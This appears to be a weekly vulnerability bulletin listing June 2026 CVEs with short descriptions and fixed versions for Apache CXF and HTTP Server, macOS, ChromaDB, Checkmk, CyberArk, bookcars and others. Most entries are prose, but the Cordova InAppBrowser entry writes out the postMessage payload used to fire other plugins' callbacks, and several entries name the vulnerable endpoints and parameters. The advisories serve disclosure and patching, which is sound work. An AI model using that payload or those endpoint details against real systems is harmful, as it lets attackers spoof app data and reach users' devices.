| Apache Software Foundation--Apache CXF | A race condition in AbstractOAuthDataProvider allows concurrent requests using the same Refresh Token to bypass single-use semantics and generate multiple valid Access Tokens, when 'recycleRefreshTokens' is set to false. A leaked refresh token can be replayed concurrently by multiple attackers or threads. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50631 |
| Apache Software Foundation--Apache CXF | A further incomplete fix for a previous advisory CVE-2026-44417 (Untrusted JMS configuration can lead to RCE) for Apache CXF has been identified, which can allow code execution capabilities, if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50632 |
| Apache Software Foundation--Apache CXF | A JNDI Injection vulnerability has been discovered in Apache CXF's JCA integration module, which can allow for code execution, if an attacker is able to manipulate the JCA deployment descriptor (ra.xml) or runtime activation parameters. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50633 |
| Apache Software Foundation--Apache CXF | A vulnerability in Apache CXF's JwsJsonContainerRequestFilter can be exploited to cause CXF to process metadata that was not authenticated by the accepted signature. This can bypass the application's assumption that accepted `Content-Type` or protected HTTP-header metadata came from a verified signature entry, and may steer downstream JAX-RS entity parsing or signed-header consistency checks. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue. | 2026-06-12 | not yet calculated | CVE-2026-50634 |
| Apache Software Foundation--Apache CXF | There is no restriction on the number of attachment headers that a message can contain when being deserialized by Apache CXF, which can lead to uncontrolled resource consumption or a denial of service attack. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue by imposing a maximum default of 500 attachments per message. | 2026-06-12 | not yet calculated | CVE-2026-50645 |
| Apache Software Foundation--Apache HTTP Server | Use After Free vulnerability in Apache HTTP Server with mod_ldap in per-directory configuration. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-29167 |
| Apache Software Foundation--Apache HTTP Server | A cross-site scripting vulnerability exists in mod_proxy_ftp's HTML directory list generation in Apache HTTP Server 2.4.67 and earlier when listing FTP directory contents either via forward or reverse proxy configuration. Users are recommended to upgrade to version 2.4.68, which fixes this issue. | 2026-06-08 | not yet calculated | CVE-2026-29170 |
| Apache Software Foundation--Apache HTTP Server | A buffer overflow in mod_proxy_html in Apache HTTP Server 2.4.67 and earlier allows an attack by an untrusted backend. Users are recommended to upgrade to version 2.4.68, which fixes this issue. | 2026-06-08 | not yet calculated | CVE-2026-34355 |
| Apache Software Foundation--Apache HTTP Server | Heap-based Buffer Overflow vulnerability in Apache HTTP Server with malicious backend servers and ProxyPassReverseCookie*. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-34356 |
| Apache Software Foundation--Apache HTTP Server | A path handling issue in mod_dav_fs in Apache 2.4.67 and earlier allows a WebDAV content author to directly manipulate trusted DAV property databases, potentially causing child process crashes. Users are recommended to upgrade to version 2.4.68, which fixes this issue. | 2026-06-08 | not yet calculated | CVE-2026-42535 |
| Apache Software Foundation--Apache HTTP Server | Heap-based Buffer Overflow vulnerability in Apache HTTP Server with mod_xml2enc, xml2StartParse, and untrusted content. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-42536 |
| Apache Software Foundation--Apache HTTP Server | Out-of-bounds Read vulnerability in Apache HTTP Server with mod_headers and mod_mime and multiple response languages. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. | 2026-06-08 | not yet calculated | CVE-2026-43951 |
| Apache Software Foundation--Apache HTTP Server | Improper Privilege Management vulnerability in Apache HTTP Server 2.4.67 and earlier allows local .htaccess authors to read files with the privileges of the httpd user. This issue affects Apache HTTP Server: from through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-44119 |
| Apache Software Foundation--Apache HTTP Server | Buffer Over-read vulnerability in Apache HTTP Server via outbound OCSP requests to an attacker-controlled OCSP server. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-44185 |
| Apache Software Foundation--Apache HTTP Server | Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in the mod_proxy_ftp module in Apache HTTP Server with an attacker-controlled backend FTP server. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-44186 |
| Apache Software Foundation--Apache HTTP Server | Buffer Underwrite vulnerability in Apache HTTP Server on crafted regular expressions in the configuration. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-44631 |
| Apache Software Foundation--Apache HTTP Server | Use After Free vulnerability in Apache HTTP Server module mod_http2 when file handles are already exhausted. This issue affects Apache HTTP Server: from 2.4.55 through 2.4.67. | 2026-06-08 | not yet calculated | CVE-2026-48913 |
| Apache Software Foundation--Apache HTTP Server | Memory Allocation with Excessive Size Value vulnerability in Apache HTTP Server's mod_http leads to denial of service via malicious HTTP requests. This issue affects Apache HTTP Server: from 2.4.17 through 2.4.67. | 2026-06-08 | not yet calculated | CVE-2026-49975 |
| Apache Software Foundation--Apache OFBiz | A privilege escalation vulnerability in Apache OFBiz allows a low-privileged authenticated user to obtain higher privileges. This issue affects Apache OFBiz: before 24.09.07. Users are recommended to upgrade to version 24.09.07, which fixes the issue. | 2026-06-10 | not yet calculated | CVE-2026-47342 |
| Apache Software Foundation--Apache OFBiz | Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz allows a low-privileged authenticated user with Content/DataResource editing privileges to perform template injection attacks that could lead to Remote Code Execution. This issue affects Apache OFBiz: before 24.09.07. Users are recommended to upgrade to version 24.09.07, which fixes the issue. | 2026-06-10 | not yet calculated | CVE-2026-50223 |
| Apache Software Foundation--Cordova Plugin InAppBrowser | Summary: The iOS implementation of `cordova-plugin-inappbrowser` passes the `id` field from a `WKScriptMessage` body to `commandDelegate sendPluginResult:callbackId:` with no format validation (`CDVWKInAppBrowser.m:560-574`). Any web content loaded inside the InAppBrowser can fire any pending Cordova callback in the host app by posting a message whose `id` field is a guessable or enumerated callback identifier. An attack abusing this weakness must be tailored to the specific plugins and callback IDs the host app uses, though an attacker with knowledge of common Cordova plugin configurations could craft reusable payloads targeting widely adopted plugins. Impact: An unauthenticated remote attacker who controls content displayed in the InAppBrowser, via a URL the app opens (OAuth redirect, marketing link, deep-link target) or a network interception, can call `window.webkit.messageHandlers.cordova_iab.postMessage({id: '<victim-callback-id>', d: '...'})` to fire callbacks belonging to any other installed Cordova plugin (Camera, Contacts, File, Geolocation). Cordova callback IDs follow the predictable format `<PluginName><sequential-integer>`, making enumeration feasible. Successful exploitation allows the attacker to spoof plugin results across trust boundaries, for example by injecting a forged camera approval, a fabricated contacts list, or a crafted file-read response. This issue affects Cordova Plugin InAppBrowser: from 3.1.0 through 6.0.0. Users are recommended to upgrade to version 6.0.1, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-47430 |
| apify--crawlee-python | Crawlee is a web scraping and browser automation library. From version 1.0.0 to before version 1.7.0, Crawlee is vulnerable to SSRF via sitemap-derived URLs. This issue has been patched in version 1.7.0. | 2026-06-10 | not yet calculated | CVE-2026-46497 |
| apostrophecms--apostrophe | ApostropheCMS is an open-source Node.js content management system. Versions up to and including 4.29.0 are vulnerable to stored cross-site scripting via an unsanitized user display name in the draft version tooltip. As of time of publication, no known patched versions are available. | 2026-06-12 | not yet calculated | CVE-2026-45014 |
| Apple--iOS and iPadOS | An authorization issue was addressed with improved state management. This issue is fixed in iOS 18.4 and iPadOS 18.4, macOS Sequoia 15.4. An app may be able to leak sensitive user information. | 2026-06-11 | not yet calculated | CVE-2025-46308 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.4, macOS Sonoma 14.7.5, macOS Ventura 13.7.5. An app may be able to cause unexpected system termination. | 2026-06-11 | not yet calculated | CVE-2025-24165 |
| Apple--macOS | A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sequoia 15.4. An app may be able to access sensitive user data. | 2026-06-11 | not yet calculated | CVE-2025-24268 |
| Apple--macOS | This issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in macOS Sequoia 15.4. An app may be able to break out of its sandbox. | 2026-06-11 | not yet calculated | CVE-2025-24284 |
| Apple--macOS | The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.4, macOS Sonoma 14.7.5, macOS Ventura 13.7.5. A malicious app may be able to access private information. | 2026-06-11 | not yet calculated | CVE-2025-30431 |
| Apple--macOS | A privacy issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sequoia 15.4. An app may be able to access sensitive user data. | 2026-06-11 | not yet calculated | CVE-2025-30459 |
| Apple--macOS | The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.4. An app may be able to bypass launch constraint protections and execute malicious code with elevated privileges. | 2026-06-11 | not yet calculated | CVE-2025-31272 |
| Apple--macOS | This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Sequoia 15.4. An app may be able to access protected user data. | 2026-06-11 | not yet calculated | CVE-2025-43278 |
| Apple--macOS | An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Tahoe 26.1. A malicious app may be able to access sensitive user data. | 2026-06-11 | not yet calculated | CVE-2025-43339 |
| Apple--macOS | This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Sequoia 15.4. An app may be able to access protected user data. | 2026-06-11 | not yet calculated | CVE-2025-46293 |
| Apple--macOS | A logging issue was addressed with improved data redaction. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2026-06-11 | not yet calculated | CVE-2025-46313 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.1. An app may be able to access protected user data. | 2026-06-11 | not yet calculated | CVE-2025-46315 |
| Apple--macOS Monterey | A malicious application may cause unexpected changes in memory shared between processes. A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.4. | 2026-06-10 | not yet calculated | CVE-2022-26758 |
| Apple--macOS Monterey | A person with access to a Mac may be able to bypass Login Window. A consistency issue was addressed with improved state handling. This issue is fixed in macOS Monterey 12.4. | 2026-06-10 | not yet calculated | CVE-2022-48575 |
| Arm--C1-Ultra | Arm C1-Ultra, C1-Premium, Neoverse V3 & V3AE, Neoverse V2, Neoverse V1, Neoverse-N2, Neoverse-N1, Cortex-X925, Cortex-X4, Cortex-X3, Cortex-X2, Cortex-X1 & X1C, Cortex-A710, Cortex-A78, A78AE & A78C, Cortex-A77, Cortex-A76 & A76A may allow writes to resources owned by a higher exception level. | 2026-06-09 | not yet calculated | CVE-2025-10263 |
| ARODLAND--Crypt::PBKDF2 | Crypt::PBKDF2 versions before 0.261630 for Perl are vulnerable to timing attacks. These versions use Perl's built-in eq comparison. Discrepancies in timing could be used to guess the underlying derived-key. | 2026-06-12 | not yet calculated | CVE-2017-20240 |
| ARODLAND--Crypt::PBKDF2 | Crypt::PBKDF2 versions before 0.261630 for Perl generate insecure random values for salts. These versions use the built-in rand function, which is predictable and unsuitable for cryptography. | 2026-06-12 | not yet calculated | CVE-2026-9638 |
| ARODLAND--Crypt::PBKDF2 | Crypt::PBKDF2 versions before 0.261630 for Perl have a weak default algorithm and number of iterations. The default algorithm is HMAC-SHA1, which should only be used for legacy systems. These versions default to using 1000 iterations. Depending on the chosen algorithm, 220,000 to 1,400,000 iterations should be used. | 2026-06-12 | not yet calculated | CVE-2026-9641 |
| authzed--spicedb | SpiceDB is an open source database system for creating and managing security-critical application permissions. From version 1.15.0 to before version 1.52.0, caveat structures with nested lists can result in improper cache reuse. This issue has been patched in version 1.52.0. | 2026-06-10 | not yet calculated | CVE-2026-46668 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios's Node.js HTTP adapter may forward a Proxy-Authorization header to a redirected origin during specific proxy-to-direct redirect flows. This affects Node.js usage, where an initial HTTP request is sent through an authenticated HTTP proxy, redirects are followed, and the redirected URL is no longer proxied. Under affected redirect shapes, the final origin can receive the proxy credential that was intended only for the outbound proxy. This vulnerability is fixed in 0.32.0 and 1.16.0. | 2026-06-11 | not yet calculated | CVE-2026-44487 |
| bitbank2--AnimatedGIF v2.2.0 | An issue was discovered in bitbank2 AnimatedGIF v2.2.0. A buffer overflow in the DecodeLZW function allows remote attackers to cause a denial of service (crash) or potentially execute arbitrary code via a crafted GIF file. | 2026-06-09 | not yet calculated | CVE-2026-30141 |
| bookcars--bookcars | Insecure permissions in bookcars v8.3 allow authenticated attackers to escalate privileges from user to admin by modifying their user type. | 2026-06-09 | not yet calculated | CVE-2026-36720 |
| bookcars--bookcars | A lack of cryptographic signature verification in the validateAccessToken function of bookcars v8.3 allows attackers to bypass authentication via a forged JWT token. | 2026-06-09 | not yet calculated | CVE-2026-36721 |
| bookcars--bookcars | An authenticated arbitrary file upload vulnerability in the /api/create-car-image component of bookcars v8.3 allows attackers to execute arbitrary code via uploading a crafted file. | 2026-06-09 | not yet calculated | CVE-2026-36722 |
| bookcars--bookcars | An unrestricted file rename vulnerability in the /api/create-user component of bookcars v8.3 allows authenticated attackers to leverage directory traversal sequences to move arbitrary files from temporary storage to arbitrary locations on the server filesystem. This enables unauthorized access to sensitive files, the overwriting of critical application files, and remote code execution (RCE). | 2026-06-09 | not yet calculated | CVE-2026-36723 |
| bookcars--bookcars | An arbitrary file deletion vulnerability in the /api/delete-temp-license/{file} endpoint of bookcars v8.3 allows unauthenticated attackers to delete arbitrary files via supplying directory traversal sequences. | 2026-06-09 | not yet calculated | CVE-2026-36726 |
| bookcars--bookcars | An insecure authentication vulnerability in the /api/social-sign-in endpoint of bookcars v8.3 allows attackers to bypass authentication via a forged JWT token. | 2026-06-09 | not yet calculated | CVE-2026-36727 |
| Broadcom--Layer 7 API Gateway | An attacker who intercepts and tampers with traffic between the client application and the API Gateway server could potentially deserialize arbitrary objects. This vulnerability could lead to broken security expectations or remote code execution. | 2026-06-10 | not yet calculated | CVE-2026-11815 |
| Broadcom--Symantec Endpoint Protection CleanWipe Removal Tool | CleanWipe Removal Tool (macOS), prior to 16.0.0.65, may be susceptible to a Local Privilege Escalation vulnerability, a type of issue whereby an attacker with limited-privilege access on an affected system can escalate their privileges to gain administrative control. | 2026-06-10 | not yet calculated | CVE-2026-11626 |
| Camaleon CMS--Camaleon CMS | Camaleon CMS 2.9.2 contains an improper authorization vulnerability in the administrator draft autosave endpoint. A low-privileged authenticated user can send an arbitrary post_id to POST /admin/post_type/<POST_TYPE_ID>/drafts and overwrite the draft associated with another user's post. | 2026-06-12 | not yet calculated | CVE-2026-10715 |
| cerebrate--cerebrate | Cerebrate before version 1.37 contains a mass-assignment vulnerability in the generic CRUD add path. The add() handler attempted to remove an attacker-supplied id from $params before normalizing the request through __massageInput(). Because the normalized $input could still contain an id field, a user able to reach an affected add endpoint could supply an identifier that should have been server-controlled. Successful exploitation could allow creation of objects with attacker-chosen identifiers, potentially causing unauthorized data manipulation, object spoofing, inconsistent references, or disruption through identifier collisions, depending on the affected model and endpoint permissions. The issue was fixed in v1.37 by removing id from the normalized input before entity patching. | 2026-06-11 | not yet calculated | CVE-2026-53901 |
| cerebrate--cerebrate | Cerebrate before version 1.37 allowed the id primary key field to be supplied through request input during CRUD edit operations and certain custom entity patching flows. In affected entities that did not explicitly mark id as inaccessible, an authenticated attacker could submit a crafted edit request containing the id of another record, causing the save operation to update that unrelated record instead of the record identified by the route parameter. The issue affected several entity types inheriting permissive mass-assignment defaults, including User, Role, UserSetting, LocalTool, PermissionLimitation, and EnumerationCollection. Since UserSettings edit functionality was reachable by any authenticated user, exploitation could allow unauthorized modification of records within the same entity type, with impact depending on the affected endpoint and writable fields. Cerebrate 1.37 fixes this by stripping id from request input after marshalling callbacks and by globally marking id as inaccessible in the base AppModel entity. The discovery of these potential vulnerabilities is inherited from the initial finding by Jeroen Pinoy, with additional support from AI-Assisted Optus 4.8 (the commit wrongly assigns Claude Fable 5 as the model switched), and was coordinated by Andras Iklody. | 2026-06-11 | not yet calculated | CVE-2026-53911 |
| cerebrate--cerebrate | Cerebrate before version 1.37 exposed credential material from self-registration requests. The self-registration workflow stored the registrant's hashed password in the inbox message data payload. This payload was returned unredacted through inbox index and view responses, including HTML, JSON, and CSV outputs, and could also be written unredacted into audit log entries for the inbox message. An authenticated user with sufficient privileges to access inbox entries or related audit logs could retrieve password hashes associated with pending self-registration requests. Although the exposed value is a password hash rather than a plaintext password, disclosure of password hashes may enable offline password-cracking attempts and could increase risk where users reuse passwords across systems. Cerebrate 1.37 fixes the issue by redacting sensitive password and authkey fields from inbox display/API output and recursively redacting those fields from JSON values written to audit logs, while leaving the stored registration payload intact for account creation processing. Affected component: Inbox self-registration request handling and audit logging. Fixed version: Cerebrate 1.37. | 2026-06-11 | not yet calculated | CVE-2026-53912 |
| Checkmk GmbH--Checkmk | Stored cross-site scripting in the URL dashboard widget in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows a user with dashboard editing permissions to store a URL with a dangerous URI scheme such as javascript: that executes scripts in other users' browsers when they view the dashboard. | 2026-06-08 | not yet calculated | CVE-2026-7186 |
| Checkmk GmbH--Checkmk | Incorrect authorization in the User Messages dashboard widget in Checkmk <2.5.0p5 causes the message-fetching endpoints to return the dashboard creator's messages rather than the viewer's, allowing an attacker who knows a valid public dashboard share token to read the issuer's personal messages by sending requests to the underlying endpoint, even without a User Messages widget present. | 2026-06-08 | not yet calculated | CVE-2026-7765 |
| Checkmk GmbH--Checkmk | Stored cross-site scripting in the global settings change log in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows an administrator who can change global settings to store malicious HTML or JavaScript in changelog messages that executes in other users' browsers when they view the Activate Changes page or Audit log. | 2026-06-08 | not yet calculated | CVE-2026-8078 |
| Checkmk GmbH--Checkmk | Improper neutralization of HTML-encoded characters in the URL validation function in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows an authenticated user to bypass URL validation and inject malicious URLs such as javascript: URIs, resulting in cross-site scripting when another user interacts with the crafted link. | 2026-06-08 | not yet calculated | CVE-2026-8833 |
| Checkmk GmbH--Checkmk | Stored cross-site scripting in the service discovery active check output in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows an administrator who can configure active or custom checks to inject malicious HTML or JavaScript into check output that executes in the browser of an admin or a user with host read permissions when they run the check on the service discovery page. | 2026-06-08 | not yet calculated | CVE-2026-9549 |
| checkpoint--Quantum Security Gateway | A logic flow weakness in Remote Access and Mobile Access certificate validation in deprecated IKEv1 key exchange allows an unauthenticated remote attacker to bypass user authentication and establish a remote access VPN connection without a valid user password. | 2026-06-08 | not yet calculated | CVE-2026-50751 |
| Chroma--ChromaDB | A lack of authorization validation in version 0.4.17 or later of the ChromaDB Python project allows any authenticated user to arbitrarily read, write, update, or delete data in any tenant's collection regardless of which tenant they belong to. | 2026-06-12 | not yet calculated | CVE-2026-45830 |
| Chroma--ChromaDB | The SimpleRBACAuthorizationProvider authorization provider in versions 0.5.0 or later of the ChromaDB Python project evaluates whether a user holds a given permission but never checks which tenant, database, or collection that permission applies to, allowing users to perform cross-tenant actions. | 2026-06-12 | not yet calculated | CVE-2026-45831 |
| Chroma--ChromaDB | All V1 collection-level endpoints in ChromaDB's Python project pass None for the tenant and database to the authorization layer, allowing attackers to bypass authorization controls by using the V1 endpoints. | 2026-06-12 | not yet calculated | CVE-2026-45832 |
| Chroma--ChromaDB | A code injection vulnerability in version 0.4.17 or later of the ChromaDB Python project allows an authenticated attacker who holds the UPDATE_COLLECTION permission to run arbitrary code on the server by sending a malicious model repository with trust_remote_code set to true to the /api/v2/tenants/default_tenant/databases/default_database/collections/{collection_id} endpoint. | 2026-06-12 | not yet calculated | CVE-2026-45833 |
| Chroma--ChromaDB | A lack of authorization validation in version 1.0.0 or later of the ChromaDB Rust project allows any authenticated user to arbitrarily read, write, update, or delete data in any tenant's collection regardless of which tenant they belong to. | 2026-06-12 | not yet calculated | CVE-2026-8828 |
| cloud-hypervisor--cloud-hypervisor | Cloud Hypervisor is a Virtual Machine Monitor for Cloud workloads. From version 21.0 to before version 51.2, a guest can cause a use-after-free in the cloud-hypervisor process by submitting two virtio-block descriptor chains that reuse the same head_index while asynchronous block I/O is enabled (e.g. io_uring, aio). When the kernel completes the duplicate operation before the original, the completion path frees a bounce buffer that the kernel is still actively reading from or writing to, corrupting the freed memory. This issue has been patched in versions 51.2 and 52.0. | 2026-06-09 | not yet calculated | CVE-2026-45782 |
| Concrete CMS--Concrete CMS | Concrete CMS below 9.5.2 is vulnerable to PHP Object Injection via unserialize() calls in the Permission, Cache, and Search components. An unauthenticated attacker may trigger arbitrary PHP object instantiation if a malicious serialized payload has been placed in the database. Thanks to XananasX7 for reporting. | 2026-06-10 | not yet calculated | CVE-2026-10721 |
| CyberArk Software, a Palo Alto Networks Company--Conjur Cloud (Edge Finding only) | Idira Secrets Manager SaaS Edge versions prior to 1.8 exhibit improper access control within its internal authentication components. A remote, unauthenticated attacker could exploit this by submitting a specially crafted request. Under specific circumstances, this could allow the attacker to manipulate internal validation mechanisms, potentially leading to a bypass of identity verification and the unauthorized acquisition of an access token. CyberArk Security Bulletin: CA26-20 | 2026-06-11 | not yet calculated | CVE-2026-45177 |
| CyberArk Software, a Palo Alto Networks Company--Conjur Enterprise | Idira Secrets Manager Self-Hosted versions 13.8.0 and lower exhibit improper access control within internal cluster endpoints. A remote, authenticated attacker possessing standard node-level credentials could leverage these endpoints to potentially retrieve unauthorized secrets or cause a denial of service (DoS). CyberArk Security Bulletin: CA26-20 | 2026-06-11 | not yet calculated | CVE-2026-45178 |
| CyberArk Software, a Palo Alto Networks Company--Identity Browser Extensions | Idira Identity Browser Extension (Chrome, Firefox, and Edge builds) versions prior to 26.8.1 exhibit an origin validation flaw within its internal web-page verification routines. If an authenticated user navigates to a specially crafted webpage, this interaction could potentially allow a remote attacker to trigger unauthorized application interaction or execution parameters within the context of that authenticated browser session. CyberArk Security Bulletin: CA26-21 | 2026-06-11 | not yet calculated | CVE-2026-45173 |
| CyberArk Software, a Palo Alto Networks Company--Idira Endpoint Privilege Manager | Idira Endpoint Privilege Manager Linux Agent versions prior to 26.5 allow a local attacker to potentially compromise the agent daemon initialization. CyberArk Security Bulletin: CA26-19 | 2026-06-11 | not yet calculated | CVE-2026-45174 |
| CyberArk Software, a Palo Alto Networks Company--Idira Endpoint Privilege Manager | Idira Endpoint Privilege Manager Agent versions prior to 26.5 exhibit improper access control within internal agent validation processes. A local attacker could potentially bypass built-in security controls or cryptographic validations. Under specific circumstances, this could allow the attacker to circumvent agent self-defense mechanisms and execute unauthorized operations. CyberArk Security Bulletin: CA26-19 | 2026-06-11 | not yet calculated | CVE-2026-45175 |
| CyberArk Software, a Palo Alto Networks Company--Idira Endpoint Privilege Manager | Idira Endpoint Privilege Manager Agent versions prior to 26.5 exhibit improper access control within high-privileged agent components. A local, low-privileged attacker could exploit this by manipulating an internal communication mechanism or file operation. Under specific circumstances, this could potentially allow the attacker to bypass permission restrictions and execute unauthorized local actions with elevated privileges. CyberArk Security Bulletin: CA26-19 | 2026-06-11 | not yet calculated | CVE-2026-45176 |
| CyberArk Software, a Palo Alto Networks Company--PAM Self-Hosted, Privilege Cloud | Due to incomplete input validation in Idira Privileged Session Manager for SSH (PSMP) versions prior to 15.0.2, 14.6.3, 14.2.5, and 14.0.6, an authenticated, low-privileged user could potentially execute arbitrary commands on the PSMP host. CyberArk Security Bulletins: CA26-17 and CA26-18 | 2026-06-11 | not yet calculated | CVE-2026-45172 |
| CyberArk Software, a Palo Alto Networks Company--PAM SH Connector | In Idira Privilege Cloud Connector versions prior to 1.1.100504, under specific conditions and configuration scenarios, TLS certificate validation may not be fully enforced. CyberArk Security Bulletin: CA26-17 | 2026-06-12 | not yet calculated | CVE-2026-45170 |
| CyberArk Software, a Palo Alto Networks Company--PAM SH Vault | Idira Privileged Access Manager (PAM) Self-Hosted Vault versions prior to 15.0.3, 14.6.5, 14.2.7, and 14.0.8 exhibit a validation vulnerability. Under specific circumstances and configuration scenarios, processing unexpected input could potentially lead to an unexpected service termination, resulting in a localized denial of service (DoS). CyberArk Security Bulletin: CA26-17 | 2026-06-12 | not yet calculated | CVE-2026-45169 |
| CyberArk Software, a Palo Alto Networks Company--Privileged Session Manager, Vault | Due to incomplete input validation and improperly configured folder permissions within Idira Privileged Session Manager (PSM) versions prior to 15.0.3, 14.6.3, 14.2.5, and 14.0.5, an authenticated, low-privileged user could potentially execute arbitrary code. CyberArk Security Bulletins: CA26-17 and CA26-18 | 2026-06-11 | not yet calculated | CVE-2026-45171 |
| Dahua--IPC | A vulnerability has been found in some Dahua products. An attacker may obtain the device's CA root certificate. If that CA is installed and trusted on client systems, the attacker could issue fraudulent certificates trusted by those clients and undermine the certificate trust chain. | 2026-06-10 | not yet calculated | CVE-2026-29114 |
| Dahua--IPC/SD | A vulnerability has been found in some Dahua products that could allow an authenticated remote attacker to send a specially crafted packet, triggering an exception that causes the system to reboot unexpectedly, resulting in a denial of service. | 2026-06-10 | not yet calculated | CVE-2026-29115 |
| Dahua--IPC/SD/NVR/XVR/EVS/VTO/VTH/ASI/TPC | A vulnerability has been found in some Dahua products that could allow an unauthenticated remote attacker to send a specially crafted packet, triggering an exception that causes the system to reboot unexpectedly, resulting in a denial of service. | 2026-06-10 | not yet calculated | CVE-2026-29116 |
| damasac thaipalliative_lte--damasac thaipalliative_lte | SQL Injection vulnerability in damasac thaipalliative_lte through version 3.0 allows remote attackers to execute arbitrary SQL commands via the idFormMain parameter to /substudy/ezform.php (line 14) and the id parameter (line 49). The parameters are concatenated directly into SQL queries without sanitization or parameterized statements. | 2026-06-11 | not yet calculated | CVE-2026-38581 |
| Debian--debusine | Debusine is an integrated solution to build, distribute and maintain a Debian-based distribution. Files managed by debusine are organized into artifacts. The endpoints that create and delete relationships between artifacts enforced no permissions checks beyond being able to see the artifacts in question. | 2026-06-10 | not yet calculated | CVE-2026-11852 |
| Debian--debusine | Debusine is an integrated solution to build, distribute and maintain a Debian-based distribution. Debian source packages (.dsc) and upload artifacts (.changes) are manifest files that name the files that make up the artifact. The parser used to read these files in Debusine accepted arbitrary fully user-controlled paths. The mergeuploads task could be abused to create arbitrary symbolic links on a worker, overwriting any file that the worker user has access to. | 2026-06-10 | not yet calculated | CVE-2026-11853 |
| DedeCMS--DedeCMS | DedeCMS V5.7.118 is vulnerable to Command Execution in file_manage_control.php. | 2026-06-09 | not yet calculated | CVE-2026-38615 |
| Devolutions--PowerShell Universal | Improper access control in Devolutions PowerShell Universal 2026.1.7 and earlier allows an unauthenticated remote attacker to obtain the OpenAPI specification of user-defined REST endpoints. | 2026-06-12 | not yet calculated | CVE-2026-8694 |
| Devolutions--Server | Improper neutralization of special elements in the built-in PAM provider password rotation templates in Devolutions Server allows an authenticated user with write access to a vault to execute arbitrary commands on the systems managed by the affected PAM provider. This issue affects Devolutions Server 2026.2.4.0, and Devolutions Server 2026.1.20.0 and earlier. | 2026-06-08 | not yet calculated | CVE-2026-10544 |
| Devolutions--Server | Improper access control in the ticketing integration settings in Devolutions Server allows an authenticated low-privileged user to obtain cleartext credentials for configured ticketing integrations via a crafted API request. This issue affects Devolutions Server 2026.2.4.0, and Devolutions Server 2026.1.20.0 and earlier. | 2026-06-08 | not yet calculated | CVE-2026-10786 |
| Devolutions--Server | Missing authorization in the deleted user groups API in Devolutions Server allows an authenticated low-privileged user to enumerate metadata of deleted user groups via a crafted API request. This issue affects Devolutions Server 2026.2.4.0, and Devolutions Server 2026.1.20.0 and earlier. | 2026-06-08 | not yet calculated | CVE-2026-10787 |
| duck-organization--duck-site | In Duck Site before version 1.0.1, the repository has a deploy workflow that runs after the build workflow completes. The build workflow runs on pull requests, while the deploy workflow runs with package-write permissions and deployment secrets. If an attacker can make a pull request build satisfy the deploy workflow's main branch condition, the deploy job checks out the triggering workflow commit, builds it into a Docker image, pushes it as latest, and triggers Dokploy deployment. This can allow attacker-controlled pull request code to become the deployed production site image without being merged. This issue has been patched in version 1.0.1. | 2026-06-11 | not yet calculated | CVE-2026-47174 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.1, any guild member who can invoke slash commands can use /automod add, /automod remove, and /automod list because the command has no Discord default permission requirement and no runtime moderator permission check. An attacker can add a rule matching common text and make the bot delete other users' messages. This issue has been patched in version 1.0.1. | 2026-06-11 | not yet calculated | CVE-2026-47163 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.3, a user with Manage Server / ManageGuild, but without Manage Roles or Administrator, can configure the bot's AutoRole feature to assign an arbitrary role to new members. If the selected role has Administrator and is below the bot's highest role, the attacker can join with a controlled account and receive full server admin. This issue has been patched in version 1.0.3. | 2026-06-11 | not yet calculated | CVE-2026-47169 |
